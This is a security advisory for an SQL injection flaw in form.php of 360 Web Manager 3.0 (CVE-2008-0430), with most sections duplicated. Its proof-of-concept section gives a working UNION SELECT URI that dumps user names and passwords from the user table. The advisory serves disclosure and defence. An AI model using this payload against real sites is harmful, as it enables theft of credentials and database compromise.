360 Web Manager 'form.php' SQL Injection Vulnerability
BID:27364
Info
360 Web Manager 'form.php' SQL Injection Vulnerability
| Bugtraq ID: | 27364 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0430 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 20 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | Ded MustD!e discovered this vulnerability. |
| Vulnerable: |
360 Web Manager 360 Web Manager 3.0 |
| Not Vulnerable: | |
Discussion
360 Web Manager 'form.php' SQL Injection Vulnerability
360 Web Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects 360 Web Manager 3.0; other versions may also be vulnerable.
360 Web Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects 360 Web Manager 3.0; other versions may also be vulnerable.
Exploit / POC
360 Web Manager 'form.php' SQL Injection Vulnerability
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*
Solution / Fix
360 Web Manager 'form.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
360 Web Manager 'form.php' SQL Injection Vulnerability
References:
References:
- 360 Web Manager Homepage (360 Web Manager)